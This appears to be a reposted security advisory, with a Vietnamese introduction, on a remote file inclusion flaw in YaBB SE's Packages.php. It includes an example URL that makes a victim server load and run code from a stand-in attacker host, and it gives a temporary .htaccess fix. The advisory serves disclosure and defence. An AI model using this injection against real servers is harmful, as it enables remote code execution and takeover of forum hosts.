HCE-Loi bao mat trong Yabb

Lỗi bảo mật trong Yabb, cho phép truy cập trái phép từ xa :
trang này đã được đọc lần

YaBB là một free software forum được dùng khá phổ biến hiện nay. Lỗi được tìm thấy trong Version 1.50 trở về trước. Trong yabb forum phần thư mục source có một file Packages.php trong những dòng đầu của file này có thể cho phép tin tặc truy cập trái phép từ xa và dùng các lệnh nguy hiểm .
xin tham khảo thông tin đầy đủ dưới đây:

All versions prior to 1.5.0
----------------------
Vulnerability:
----------------------
YabbSE keeps all of it's function includes in a directory called "Sources" which
is not protected. Inside this directory a file called Packages.php exists. This
file is supposed to be included and not called directly, but if an attacker calls
it directly he/she may cause the script to run remote arbitrary code.
Bellow are a couple of the first lines in Packages.php:

********
..

global $adminplver;
$Packagesphpver="YaBB SE 1.4.1";

$safe_mode = ini_get("safe_mode");

$pacmanver = "1.4.1";

include_once("$sourcedir/Packer.php");

..

********

We can see here that the variable $sourcedir is never defined and therefore may be
defined through global injection.
Example:

http://victim/yabbse/Sources/Packages.php?...ttp://attacker/

where the attacker server has a file called Packer.php.
An attacker may execute remote code on the server with webserver permissions.

Side-note: An attacker may also use this file for XSS attack on the server.

----------------------
Solution:
----------------------

Please check the vendor's website for new patches.

As a temporary solution, create a .htaccess file that contains 'Deny from all'.
Place it in the /Sources/ directory and that should block remote users from accessing it.

----------------------
Greetz:
----------------------

Hawkje, Truckle, Cyon, daemorhedron, Mithrandir

<------- ------->

Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2

Big $$$ to be made with the HushMail Affiliate Program:
https://www.hushmail.com/about.php?subloc=a...affiliate&l=427